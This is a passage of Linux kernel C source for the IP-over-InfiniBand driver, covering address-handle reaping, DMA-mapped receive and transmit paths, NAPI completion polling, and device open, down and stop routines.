* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include <linux/delay.h>
#include <linux/dma-mapping.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include "ipoib.h"
#ifdef CONFIG_INFINIBAND_IPOIB_DEBUG_DATA
static int data_debug_level;
module_param(data_debug_level, int, 0644);
MODULE_PARM_DESC(data_debug_level,
"Enable data path debug tracing if > 0");
#endif
static DEFINE_MUTEX(pkey_mutex);
/*
 * Allocate a reference-counted IPoIB address handle wrapping ib_create_ah().
 * Returns NULL on allocation or ib_create_ah() failure.
 */
struct ipoib_ah *ipoib_create_ah(struct net_device *dev,
                                 struct ib_pd *pd, struct ib_ah_attr *attr)
{
    struct ipoib_ah *ah;

    ah = kmalloc(sizeof *ah, GFP_KERNEL);
    if (!ah)
        return NULL;

    ah->dev = dev;
    ah->last_send = 0;
    kref_init(&ah->ref);

    ah->ah = ib_create_ah(pd, attr);
    if (IS_ERR(ah->ah)) {
        kfree(ah);
        ah = NULL;
    } else
        ipoib_dbg(netdev_priv(dev), "Created ah %p\n", ah->ah);

    return ah;
}
/*
 * kref release callback: don't destroy the AH immediately (sends may still
 * reference it); queue it on dead_ahs for the reaper to free once the TX
 * tail has passed its last_send.
 */
void ipoib_free_ah(struct kref *kref)
{
    struct ipoib_ah *ah = container_of(kref, struct ipoib_ah, ref);
    struct ipoib_dev_priv *priv = netdev_priv(ah->dev);

    unsigned long flags;

    spin_lock_irqsave(&priv->lock, flags);
    list_add_tail(&ah->list, &priv->dead_ahs);
    spin_unlock_irqrestore(&priv->lock, flags);
}
/*
 * Undo the DMA mapping of one UD receive buffer: head + page fragment when
 * scatter/gather is needed for large MTUs, a single buffer otherwise.
 */
static void ipoib_ud_dma_unmap_rx(struct ipoib_dev_priv *priv,
                                  u64 mapping[IPOIB_UD_RX_SG])
{
    if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
        ib_dma_unmap_single(priv->ca, mapping[0], IPOIB_UD_HEAD_SIZE,
                            DMA_FROM_DEVICE);
        ib_dma_unmap_page(priv->ca, mapping[1], PAGE_SIZE,
                          DMA_FROM_DEVICE);
    } else
        ib_dma_unmap_single(priv->ca, mapping[0],
                            IPOIB_UD_BUF_SIZE(priv->max_ib_mtu),
                            DMA_FROM_DEVICE);
}
/*
 * Account @length received bytes in the skb.  In the SG case the first
 * IPOIB_UD_HEAD_SIZE bytes are linear and the remainder lands in frag 0;
 * otherwise a plain skb_put() suffices.
 */
static void ipoib_ud_skb_put_frags(struct ipoib_dev_priv *priv,
                                   struct sk_buff *skb,
                                   unsigned int length)
{
    if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
        skb_frag_t *frag = &skb_shinfo(skb)->frags[0];
        unsigned int size;
        /*
         * There is only two buffers needed for max_payload = 4K,
         * first buf size is IPOIB_UD_HEAD_SIZE
         */
        skb->tail += IPOIB_UD_HEAD_SIZE;
        skb->len += length;
        size = length - IPOIB_UD_HEAD_SIZE;
        frag->size = size;
        skb->data_len += size;
        skb->truesize += size;
    } else
        skb_put(skb, length);
}
/*
 * Post receive ring entry @id to the QP.  On failure the buffer is unmapped
 * and its skb freed, and the slot left empty (skb = NULL).
 */
static int ipoib_ib_post_receive(struct net_device *dev, int id)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    struct ib_recv_wr *bad_wr;
    int ret;

    /* Tag the wr_id so the completion handler can tell RX from TX. */
    priv->rx_wr.wr_id = id | IPOIB_OP_RECV;
    priv->rx_sge[0].addr = priv->rx_ring[id].mapping[0];
    priv->rx_sge[1].addr = priv->rx_ring[id].mapping[1];

    ret = ib_post_recv(priv->qp, &priv->rx_wr, &bad_wr);
    if (unlikely(ret)) {
        ipoib_warn(priv, "receive failed for buf %d (%d)\n", id, ret);
        ipoib_ud_dma_unmap_rx(priv, priv->rx_ring[id].mapping);
        dev_kfree_skb_any(priv->rx_ring[id].skb);
        priv->rx_ring[id].skb = NULL;
    }

    return ret;
}
/*
 * Allocate and DMA-map a receive skb for ring slot @id.  For large MTUs a
 * second page fragment is mapped as well.  Returns the skb, or NULL on
 * allocation/mapping failure (nothing is left mapped in that case).
 */
static struct sk_buff *ipoib_alloc_rx_skb(struct net_device *dev, int id)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    struct sk_buff *skb;
    int buf_size;
    u64 *mapping;

    if (ipoib_ud_need_sg(priv->max_ib_mtu))
        buf_size = IPOIB_UD_HEAD_SIZE;
    else
        buf_size = IPOIB_UD_BUF_SIZE(priv->max_ib_mtu);

    skb = dev_alloc_skb(buf_size + 4);
    if (unlikely(!skb))
        return NULL;

    /*
     * IB will leave a 40 byte gap for a GRH and IPoIB adds a 4 byte
     * header. So we need 4 more bytes to get to 48 and align the
     * IP header to a multiple of 16.
     */
    skb_reserve(skb, 4);

    mapping = priv->rx_ring[id].mapping;
    mapping[0] = ib_dma_map_single(priv->ca, skb->data, buf_size,
                                   DMA_FROM_DEVICE);
    if (unlikely(ib_dma_mapping_error(priv->ca, mapping[0])))
        goto error;

    if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
        struct page *page = alloc_page(GFP_ATOMIC);
        if (!page)
            goto partial_error;
        skb_fill_page_desc(skb, 0, page, 0, PAGE_SIZE);
        mapping[1] =
            ib_dma_map_page(priv->ca, skb_shinfo(skb)->frags[0].page,
                            0, PAGE_SIZE, DMA_FROM_DEVICE);
        if (unlikely(ib_dma_mapping_error(priv->ca, mapping[1])))
            goto partial_error;
    }

    priv->rx_ring[id].skb = skb;
    return skb;

partial_error:
    /* Page (if attached) is freed along with the skb below. */
    ib_dma_unmap_single(priv->ca, mapping[0], buf_size, DMA_FROM_DEVICE);
error:
    dev_kfree_skb_any(skb);
    return NULL;
}
/* Fill the whole receive ring at startup; fail hard on the first error. */
static int ipoib_ib_post_receives(struct net_device *dev)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    int i;

    for (i = 0; i < ipoib_recvq_size; ++i) {
        if (!ipoib_alloc_rx_skb(dev, i)) {
            ipoib_warn(priv, "failed to allocate receive buffer %d\n", i);
            return -ENOMEM;
        }
        if (ipoib_ib_post_receive(dev, i)) {
            ipoib_warn(priv, "ipoib_ib_post_receive failed for buf %d\n", i);
            return -EIO;
        }
    }

    return 0;
}
/*
 * Handle one UD receive completion: validate it, hand the skb up the stack,
 * and repost the ring slot.  Runs from NAPI poll context.
 */
static void ipoib_ib_handle_rx_wc(struct net_device *dev, struct ib_wc *wc)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    unsigned int wr_id = wc->wr_id & ~IPOIB_OP_RECV;
    struct sk_buff *skb;
    u64 mapping[IPOIB_UD_RX_SG];
    union ib_gid *dgid;

    ipoib_dbg_data(priv, "recv completion: id %d, status: %d\n",
                   wr_id, wc->status);

    if (unlikely(wr_id >= ipoib_recvq_size)) {
        ipoib_warn(priv, "recv completion event with wrid %d (> %d)\n",
                   wr_id, ipoib_recvq_size);
        return;
    }

    skb = priv->rx_ring[wr_id].skb;

    if (unlikely(wc->status != IB_WC_SUCCESS)) {
        if (wc->status != IB_WC_WR_FLUSH_ERR)
            ipoib_warn(priv, "failed recv event "
                       "(status=%d, wrid=%d vend_err %x)\n",
                       wc->status, wr_id, wc->vendor_err);
        ipoib_ud_dma_unmap_rx(priv, priv->rx_ring[wr_id].mapping);
        dev_kfree_skb_any(skb);
        priv->rx_ring[wr_id].skb = NULL;
        return;
    }

    /*
     * Drop packets that this interface sent, ie multicast packets
     * that the HCA has replicated.
     */
    if (wc->slid == priv->local_lid && wc->src_qp == priv->qp->qp_num)
        goto repost;

    /* Save the mapping before the slot gets a new buffer below. */
    memcpy(mapping, priv->rx_ring[wr_id].mapping,
           IPOIB_UD_RX_SG * sizeof *mapping);

    /*
     * If we can't allocate a new RX buffer, dump
     * this packet and reuse the old buffer.
     */
    if (unlikely(!ipoib_alloc_rx_skb(dev, wr_id))) {
        ++dev->stats.rx_dropped;
        goto repost;
    }

    ipoib_dbg_data(priv, "received %d bytes, SLID 0x%04x\n",
                   wc->byte_len, wc->slid);

    ipoib_ud_dma_unmap_rx(priv, mapping);
    ipoib_ud_skb_put_frags(priv, skb, wc->byte_len);

    /* First byte of dgid signals multicast when 0xff */
    dgid = &((struct ib_grh *)skb->data)->dgid;

    if (!(wc->wc_flags & IB_WC_GRH) || dgid->raw[0] != 0xff)
        skb->pkt_type = PACKET_HOST;
    else if (memcmp(dgid, dev->broadcast + 4, sizeof(union ib_gid)) == 0)
        skb->pkt_type = PACKET_BROADCAST;
    else
        skb->pkt_type = PACKET_MULTICAST;

    /* Strip the GRH and the 4-byte IPoIB encapsulation header. */
    skb_pull(skb, IB_GRH_BYTES);
    skb->protocol = ((struct ipoib_header *) skb->data)->proto;
    skb_reset_mac_header(skb);
    skb_pull(skb, IPOIB_ENCAP_LEN);

    ++dev->stats.rx_packets;
    dev->stats.rx_bytes += skb->len;

    skb->dev = dev;
    if (test_bit(IPOIB_FLAG_CSUM, &priv->flags) && likely(wc->csum_ok))
        skb->ip_summed = CHECKSUM_UNNECESSARY;

    napi_gro_receive(&priv->napi, skb);

repost:
    if (unlikely(ipoib_ib_post_receive(dev, wr_id)))
        ipoib_warn(priv, "ipoib_ib_post_receive failed "
                   "for buf %d\n", wr_id);
}
/*
 * DMA-map a TX skb: the linear head (if any) into mapping[0], then one
 * mapping per page fragment.  Unwinds all mappings on partial failure.
 * Returns 0 on success, -EIO on any mapping error.
 */
static int ipoib_dma_map_tx(struct ib_device *ca,
                            struct ipoib_tx_buf *tx_req)
{
    struct sk_buff *skb = tx_req->skb;
    u64 *mapping = tx_req->mapping;
    int i;
    int off;

    if (skb_headlen(skb)) {
        mapping[0] = ib_dma_map_single(ca, skb->data, skb_headlen(skb),
                                       DMA_TO_DEVICE);
        if (unlikely(ib_dma_mapping_error(ca, mapping[0])))
            return -EIO;

        off = 1;
    } else
        off = 0;

    for (i = 0; i < skb_shinfo(skb)->nr_frags; ++i) {
        skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
        mapping[i + off] = ib_dma_map_page(ca, frag->page,
                                           frag->page_offset, frag->size,
                                           DMA_TO_DEVICE);
        if (unlikely(ib_dma_mapping_error(ca, mapping[i + off])))
            goto partial_error;
    }
    return 0;

partial_error:
    /* Unmap the fragments mapped so far, then the head if present. */
    for (; i > 0; --i) {
        skb_frag_t *frag = &skb_shinfo(skb)->frags[i - 1];
        ib_dma_unmap_page(ca, mapping[i - !off], frag->size, DMA_TO_DEVICE);
    }

    if (off)
        ib_dma_unmap_single(ca, mapping[0], skb_headlen(skb), DMA_TO_DEVICE);

    return -EIO;
}
/* Undo ipoib_dma_map_tx(): unmap the linear head and every fragment. */
static void ipoib_dma_unmap_tx(struct ib_device *ca,
                               struct ipoib_tx_buf *tx_req)
{
    struct sk_buff *skb = tx_req->skb;
    u64 *mapping = tx_req->mapping;
    int i;
    int off;

    if (skb_headlen(skb)) {
        ib_dma_unmap_single(ca, mapping[0], skb_headlen(skb), DMA_TO_DEVICE);
        off = 1;
    } else
        off = 0;

    for (i = 0; i < skb_shinfo(skb)->nr_frags; ++i) {
        skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
        ib_dma_unmap_page(ca, mapping[i + off], frag->size,
                          DMA_TO_DEVICE);
    }
}
/*
 * Handle one send completion: unmap and free the skb, update stats, and
 * wake the netdev queue once the ring drains to half full.
 */
static void ipoib_ib_handle_tx_wc(struct net_device *dev, struct ib_wc *wc)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    unsigned int wr_id = wc->wr_id;
    struct ipoib_tx_buf *tx_req;

    ipoib_dbg_data(priv, "send completion: id %d, status: %d\n",
                   wr_id, wc->status);

    if (unlikely(wr_id >= ipoib_sendq_size)) {
        ipoib_warn(priv, "send completion event with wrid %d (> %d)\n",
                   wr_id, ipoib_sendq_size);
        return;
    }

    tx_req = &priv->tx_ring[wr_id];

    ipoib_dma_unmap_tx(priv->ca, tx_req);

    ++dev->stats.tx_packets;
    dev->stats.tx_bytes += tx_req->skb->len;

    dev_kfree_skb_any(tx_req->skb);

    ++priv->tx_tail;
    /* Restart the queue at the half-full watermark if we stopped it. */
    if (unlikely(--priv->tx_outstanding == ipoib_sendq_size >> 1) &&
        netif_queue_stopped(dev) &&
        test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags))
        netif_wake_queue(dev);

    if (wc->status != IB_WC_SUCCESS &&
        wc->status != IB_WC_WR_FLUSH_ERR)
        ipoib_warn(priv, "failed send event "
                   "(status=%d, wrid=%d vend_err %x)\n",
                   wc->status, wr_id, wc->vendor_err);
}
/*
 * Drain up to MAX_SEND_CQE completions from the send CQ.  Returns non-zero
 * when a full batch was taken, i.e. more completions may still be pending.
 */
static int poll_tx(struct ipoib_dev_priv *priv)
{
    int n, i;

    n = ib_poll_cq(priv->send_cq, MAX_SEND_CQE, priv->send_wc);
    for (i = 0; i < n; ++i)
        ipoib_ib_handle_tx_wc(priv->dev, priv->send_wc + i);

    return n == MAX_SEND_CQE;
}
/*
 * NAPI poll: drain the receive CQ up to @budget RX completions, dispatching
 * each to the UD or connected-mode handler.  When under budget, complete
 * NAPI and re-arm the CQ; re-poll if an event raced with the re-arm.
 * Returns the number of RX completions processed.
 */
int ipoib_poll(struct napi_struct *napi, int budget)
{
    struct ipoib_dev_priv *priv = container_of(napi, struct ipoib_dev_priv, napi);
    struct net_device *dev = priv->dev;
    int done;
    int t;
    int n, i;

    done = 0;

poll_more:
    while (done < budget) {
        int max = (budget - done);

        t = min(IPOIB_NUM_WC, max);
        n = ib_poll_cq(priv->recv_cq, t, priv->ibwc);

        for (i = 0; i < n; i++) {
            struct ib_wc *wc = priv->ibwc + i;

            if (wc->wr_id & IPOIB_OP_RECV) {
                ++done;
                if (wc->wr_id & IPOIB_OP_CM)
                    ipoib_cm_handle_rx_wc(dev, wc);
                else
                    ipoib_ib_handle_rx_wc(dev, wc);
            } else
                /* CM TX completions also land on this CQ. */
                ipoib_cm_handle_tx_wc(priv->dev, wc);
        }

        if (n != t)
            break;
    }

    if (done < budget) {
        napi_complete(napi);
        if (unlikely(ib_req_notify_cq(priv->recv_cq,
                                      IB_CQ_NEXT_COMP |
                                      IB_CQ_REPORT_MISSED_EVENTS)) &&
            napi_reschedule(napi))
            goto poll_more;
    }

    return done;
}
/* Receive CQ event handler: defer all work to NAPI. */
void ipoib_ib_completion(struct ib_cq *cq, void *dev_ptr)
{
    struct net_device *dev = dev_ptr;
    struct ipoib_dev_priv *priv = netdev_priv(dev);

    napi_schedule(&priv->napi);
}
/*
 * Drain the send CQ under the xmit lock; if the queue is still stopped
 * afterwards, re-arm the poll timer to try again on the next jiffy.
 */
static void drain_tx_cq(struct net_device *dev)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);

    netif_tx_lock(dev);
    while (poll_tx(priv))
        ; /* nothing */

    if (netif_queue_stopped(dev))
        mod_timer(&priv->poll_timer, jiffies + 1);

    netif_tx_unlock(dev);
}
/* Send CQ event handler: kick the poll timer to drain from timer context. */
void ipoib_send_comp_handler(struct ib_cq *cq, void *dev_ptr)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev_ptr);

    mod_timer(&priv->poll_timer, jiffies);
}
/*
 * Build the scatter list for a mapped TX skb (head + fragments) and post
 * the send work request.  When @head is non-NULL the packet is posted as
 * an LSO (large send offload) WR with the given header of @hlen bytes.
 */
static inline int post_send(struct ipoib_dev_priv *priv,
                            unsigned int wr_id,
                            struct ib_ah *address, u32 qpn,
                            struct ipoib_tx_buf *tx_req,
                            void *head, int hlen)
{
    struct ib_send_wr *bad_wr;
    int i, off;
    struct sk_buff *skb = tx_req->skb;
    skb_frag_t *frags = skb_shinfo(skb)->frags;
    int nr_frags = skb_shinfo(skb)->nr_frags;
    u64 *mapping = tx_req->mapping;

    if (skb_headlen(skb)) {
        priv->tx_sge[0].addr = mapping[0];
        priv->tx_sge[0].length = skb_headlen(skb);
        off = 1;
    } else
        off = 0;

    for (i = 0; i < nr_frags; ++i) {
        priv->tx_sge[i + off].addr = mapping[i + off];
        priv->tx_sge[i + off].length = frags[i].size;
    }
    priv->tx_wr.num_sge = nr_frags + off;
    priv->tx_wr.wr_id = wr_id;
    priv->tx_wr.wr.ud.remote_qpn = qpn;
    priv->tx_wr.wr.ud.ah = address;

    if (head) {
        priv->tx_wr.wr.ud.mss = skb_shinfo(skb)->gso_size;
        priv->tx_wr.wr.ud.header = head;
        priv->tx_wr.wr.ud.hlen = hlen;
        priv->tx_wr.opcode = IB_WR_LSO;
    } else
        priv->tx_wr.opcode = IB_WR_SEND;

    return ib_post_send(priv->qp, &priv->tx_wr, &bad_wr);
}
/*
 * Transmit one skb over the UD QP to (@address, @qpn).  GSO packets are
 * posted as LSO with the TCP/IP header split off; non-GSO packets must fit
 * in the multicast MTU.  Stops the netdev queue when the TX ring fills and
 * drains the send CQ inline if too many sends are outstanding.
 */
void ipoib_send(struct net_device *dev, struct sk_buff *skb,
                struct ipoib_ah *address, u32 qpn)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    struct ipoib_tx_buf *tx_req;
    int hlen, rc;
    void *phead;

    if (skb_is_gso(skb)) {
        /* LSO: hand the L3/L4 header to the HCA separately. */
        hlen = skb_transport_offset(skb) + tcp_hdrlen(skb);
        phead = skb->data;
        if (unlikely(!skb_pull(skb, hlen))) {
            ipoib_warn(priv, "linear data too small\n");
            ++dev->stats.tx_dropped;
            ++dev->stats.tx_errors;
            dev_kfree_skb_any(skb);
            return;
        }
    } else {
        if (unlikely(skb->len > priv->mcast_mtu + IPOIB_ENCAP_LEN)) {
            ipoib_warn(priv, "packet len %d (> %d) too long to send, dropping\n",
                       skb->len, priv->mcast_mtu + IPOIB_ENCAP_LEN);
            ++dev->stats.tx_dropped;
            ++dev->stats.tx_errors;
            ipoib_cm_skb_too_long(dev, skb, priv->mcast_mtu);
            return;
        }
        phead = NULL;
        hlen = 0;
    }

    ipoib_dbg_data(priv, "sending packet, length=%d address=%p qpn=0x%06x\n",
                   skb->len, address, qpn);

    /*
     * We put the skb into the tx_ring _before_ we call post_send()
     * because it's entirely possible that the completion handler will
     * run before we execute anything after the post_send().  That
     * means we have to make sure everything is properly recorded and
     * our state is consistent before we call post_send().
     */
    tx_req = &priv->tx_ring[priv->tx_head & (ipoib_sendq_size - 1)];
    tx_req->skb = skb;
    if (unlikely(ipoib_dma_map_tx(priv->ca, tx_req))) {
        ++dev->stats.tx_errors;
        dev_kfree_skb_any(skb);
        return;
    }

    if (skb->ip_summed == CHECKSUM_PARTIAL)
        priv->tx_wr.send_flags |= IB_SEND_IP_CSUM;
    else
        priv->tx_wr.send_flags &= ~IB_SEND_IP_CSUM;

    /* Ring full: arm a completion notification and stop the queue. */
    if (++priv->tx_outstanding == ipoib_sendq_size) {
        ipoib_dbg(priv, "TX ring full, stopping kernel net queue\n");
        if (ib_req_notify_cq(priv->send_cq, IB_CQ_NEXT_COMP))
            ipoib_warn(priv, "request notify on send CQ failed\n");
        netif_stop_queue(dev);
    }

    rc = post_send(priv, priv->tx_head & (ipoib_sendq_size - 1),
                   address->ah, qpn, tx_req, phead, hlen);
    if (unlikely(rc)) {
        ipoib_warn(priv, "post_send failed, error %d\n", rc);
        ++dev->stats.tx_errors;
        --priv->tx_outstanding;
        ipoib_dma_unmap_tx(priv->ca, tx_req);
        dev_kfree_skb_any(skb);
        if (netif_queue_stopped(dev))
            netif_wake_queue(dev);
    } else {
        dev->trans_start = jiffies;

        address->last_send = priv->tx_head;
        ++priv->tx_head;
        skb_orphan(skb);
    }

    if (unlikely(priv->tx_outstanding > MAX_SEND_CQE))
        while (poll_tx(priv))
            ; /* nothing */
}
/*
 * Destroy dead address handles whose last posted send has completed
 * (tx_tail has advanced past their last_send).  Both the xmit lock and
 * priv->lock are held to keep tx_tail and dead_ahs stable.
 */
static void __ipoib_reap_ah(struct net_device *dev)
{
    struct ipoib_dev_priv *priv = netdev_priv(dev);
    struct ipoib_ah *ah, *tah;
    LIST_HEAD(remove_list);
    unsigned long flags;

    netif_tx_lock_bh(dev);
    spin_lock_irqsave(&priv->lock, flags);

    list_for_each_entry_safe(ah, tah, &priv->dead_ahs, list)
        if ((int) priv->tx_tail - (int) ah->last_send >= 0) {
            list_del(&ah->list);
            ib_destroy_ah(ah->ah);
            kfree(ah);
        }

    spin_unlock_irqrestore(&priv->lock, flags);
    netif_tx_unlock_bh(dev);
}
/* Periodic AH reaper work item; reschedules itself every ~1s until stopped. */
void ipoib_reap_ah(struct work_struct *work)
{
    struct ipoib_dev_priv *priv =
        container_of(work, struct ipoib_dev_priv, ah_reap_task.work);
    struct net_device *dev = priv->dev;

    __ipoib_reap_ah(dev);

    if (!test_bit(IPOIB_STOP_REAPER, &priv->flags))
        queue_delayed_work(ipoib_workqueue, &priv->ah_reap_task,
                           round_jiffies_relative(HZ));
}
/* Timer callback: drain the send CQ for the device stashed in @ctx. */
static void ipoib_ib_tx_timer_func(unsigned long ctx)
{
	struct net_device *dev = (struct net_device *)ctx;

	drain_tx_cq(dev);
}
/*
 * Bring the IB side of the interface up: resolve the P_Key index, set up
 * the QP, pre-post receive buffers, open connected mode and start the
 * periodic address-handle reaper.  Returns 0 on success, -1 on failure
 * (partial state is torn down via ipoib_ib_dev_stop() where needed).
 */
int ipoib_ib_dev_open(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);
	int ret;

	/* Map the interface P_Key to its current index in the port table. */
	if (ib_find_pkey(priv->ca, priv->port, priv->pkey, &priv->pkey_index)) {
		ipoib_warn(priv, "P_Key 0x%04x not found\n", priv->pkey);
		clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
		return -1;
	}
	set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);

	ret = ipoib_init_qp(dev);
	if (ret) {
		ipoib_warn(priv, "ipoib_init_qp returned %d\n", ret);
		return -1;
	}

	ret = ipoib_ib_post_receives(dev);
	if (ret) {
		ipoib_warn(priv, "ipoib_ib_post_receives returned %d\n", ret);
		ipoib_ib_dev_stop(dev, 1);
		return -1;
	}

	ret = ipoib_cm_dev_open(dev);
	if (ret) {
		ipoib_warn(priv, "ipoib_cm_dev_open returned %d\n", ret);
		ipoib_ib_dev_stop(dev, 1);
		return -1;
	}

	/* Arm the AH reaper; it re-queues itself roughly once per second. */
	clear_bit(IPOIB_STOP_REAPER, &priv->flags);
	queue_delayed_work(ipoib_workqueue, &priv->ah_reap_task,
			   round_jiffies_relative(HZ));

	/* Enable NAPI only on the first successful open. */
	if (!test_and_set_bit(IPOIB_FLAG_INITIALIZED, &priv->flags))
		napi_enable(&priv->napi);

	return 0;
}
/*
 * Probe the port's P_Key table for the interface's P_Key and record the
 * result in the IPOIB_PKEY_ASSIGNED flag (set if found, cleared if not).
 */
static void ipoib_pkey_dev_check_presence(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);
	u16 pkey_index = 0;
	int found;

	found = !ib_find_pkey(priv->ca, priv->port, priv->pkey, &pkey_index);
	if (found)
		set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
	else
		clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
}
/*
 * Mark the interface operationally up and start the multicast join thread,
 * but only if the P_Key is currently present in the port table; otherwise
 * quietly return 0 and wait for the P_Key to appear.
 */
int ipoib_ib_dev_up(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);

	ipoib_pkey_dev_check_presence(dev);

	if (test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
		set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
		return ipoib_mcast_start_thread(dev);
	}

	ipoib_dbg(priv, "PKEY is not assigned.\n");
	return 0;
}
/*
 * Administratively take the IB side of the interface down: mark it
 * operationally down, stop any delayed-P_Key polling, then flush multicast
 * and path state.  @flush selects whether workqueue entries are flushed
 * synchronously (callers running on the workqueue itself must pass 0).
 * Always returns 0.
 */
int ipoib_ib_dev_down(struct net_device *dev, int flush)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);

	ipoib_dbg(priv, "downing ib_dev\n");

	clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
	netif_carrier_off(dev);

	/* Shutdown the P_Key thread if still active */
	if (!test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
		mutex_lock(&pkey_mutex);
		set_bit(IPOIB_PKEY_STOP, &priv->flags);
		cancel_delayed_work(&priv->pkey_poll_task);
		mutex_unlock(&pkey_mutex);
		if (flush)
			flush_workqueue(ipoib_workqueue);
	}

	ipoib_mcast_stop_thread(dev, flush);
	ipoib_mcast_dev_flush(dev);

	ipoib_flush_paths(dev);

	return 0;
}
/* Count how many receive-ring slots still hold an skb awaiting completion. */
static int recvs_pending(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);
	int count = 0;
	int slot;

	for (slot = 0; slot < ipoib_recvq_size; ++slot)
		count += priv->rx_ring[slot].skb ? 1 : 0;

	return count;
}
/*
 * Drain the receive CQ while the device is going down.  Successful
 * completions are rewritten as flush errors so no packets are delivered
 * up the stack, then any outstanding TX completions are polled off too.
 */
void ipoib_drain_cq(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);
	int i, n;

	/*
	 * We call completion handling routines that expect to be
	 * called from the BH-disabled NAPI poll context, so disable
	 * BHs here too.
	 */
	local_bh_disable();

	do {
		n = ib_poll_cq(priv->recv_cq, IPOIB_NUM_WC, priv->ibwc);
		for (i = 0; i < n; ++i) {
			/*
			 * Convert any successful completions to flush
			 * errors to avoid passing packets up the
			 * stack after bringing the device down.
			 */
			if (priv->ibwc[i].status == IB_WC_SUCCESS)
				priv->ibwc[i].status = IB_WC_WR_FLUSH_ERR;

			/* wr_id flag bits route to the CM or datagram handler. */
			if (priv->ibwc[i].wr_id & IPOIB_OP_RECV) {
				if (priv->ibwc[i].wr_id & IPOIB_OP_CM)
					ipoib_cm_handle_rx_wc(dev, priv->ibwc + i);
				else
					ipoib_ib_handle_rx_wc(dev, priv->ibwc + i);
			} else
				ipoib_cm_handle_tx_wc(dev, priv->ibwc + i);
		}
	} while (n == IPOIB_NUM_WC);	/* full batch => may be more pending */

	while (poll_tx(priv))
		; /* nothing */

	local_bh_enable();
}
/*
 * Fully stop the IB side of the interface: disable NAPI, stop connected
 * mode, force the QP to the error state to flush posted work requests,
 * wait (bounded) for them to complete, reset the QP, and finally reap all
 * outstanding address handles.  @flush has the same meaning as in
 * ipoib_ib_dev_down().  Always returns 0.
 */
int ipoib_ib_dev_stop(struct net_device *dev, int flush)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);
	struct ib_qp_attr qp_attr;
	unsigned long begin;
	struct ipoib_tx_buf *tx_req;
	int i;

	if (test_and_clear_bit(IPOIB_FLAG_INITIALIZED, &priv->flags))
		napi_disable(&priv->napi);

	ipoib_cm_dev_stop(dev);

	/*
	 * Move our QP to the error state and then reinitialize in
	 * when all work requests have completed or have been flushed.
	 */
	qp_attr.qp_state = IB_QPS_ERR;
	if (ib_modify_qp(priv->qp, &qp_attr, IB_QP_STATE))
		ipoib_warn(priv, "Failed to modify QP to ERROR state\n");

	/* Wait for all sends and receives to complete */
	begin = jiffies;

	while (priv->tx_head != priv->tx_tail || recvs_pending(dev)) {
		/* Give the hardware up to 5 seconds before declaring it wedged. */
		if (time_after(jiffies, begin + 5 * HZ)) {
			ipoib_warn(priv, "timing out; %d sends %d receives not completed\n",
				   priv->tx_head - priv->tx_tail, recvs_pending(dev));

			/*
			 * assume the HW is wedged and just free up
			 * all our pending work requests.
			 */
			while ((int) priv->tx_tail - (int) priv->tx_head < 0) {
				tx_req = &priv->tx_ring[priv->tx_tail &
							(ipoib_sendq_size - 1)];
				ipoib_dma_unmap_tx(priv->ca, tx_req);
				dev_kfree_skb_any(tx_req->skb);
				++priv->tx_tail;
				--priv->tx_outstanding;
			}

			for (i = 0; i < ipoib_recvq_size; ++i) {
				struct ipoib_rx_buf *rx_req;

				rx_req = &priv->rx_ring[i];
				if (!rx_req->skb)
					continue;
				ipoib_ud_dma_unmap_rx(priv,
						      priv->rx_ring[i].mapping);
				dev_kfree_skb_any(rx_req->skb);
				rx_req->skb = NULL;
			}

			goto timeout;
		}

		ipoib_drain_cq(dev);

		msleep(1);
	}

	ipoib_dbg(priv, "All sends and receives done.\n");

timeout:
	del_timer_sync(&priv->poll_timer);
	qp_attr.qp_state = IB_QPS_RESET;
	if (ib_modify_qp(priv->qp, &qp_attr, IB_QP_STATE))
		ipoib_warn(priv, "Failed to modify QP to RESET state\n");

	/* Wait for all AHs to be reaped */
	set_bit(IPOIB_STOP_REAPER, &priv->flags);
	cancel_delayed_work(&priv->ah_reap_task);
	if (flush)
		flush_workqueue(ipoib_workqueue);

	begin = jiffies;

	/* Reap synchronously, but give up after one second and leak instead. */
	while (!list_empty(&priv->dead_ahs)) {
		__ipoib_reap_ah(dev);
		if (time_after(jiffies, begin + HZ)) {
			ipoib_warn(priv, "timing out; will leak address handles\n");
			break;
		}

		msleep(1);
	}

	ib_req_notify_cq(priv->recv_cq, IB_CQ_NEXT_COMP);

	return 0;
}
/*
 * One-time IB initialization for the interface: bind it to @ca/@port,
 * create the transport resources, set up the TX drain timer, and open the
 * device immediately if the netdev is already administratively up.
 * Returns 0 on success or -ENODEV on failure.
 */
int ipoib_ib_dev_init(struct net_device *dev, struct ib_device *ca, int port)
{
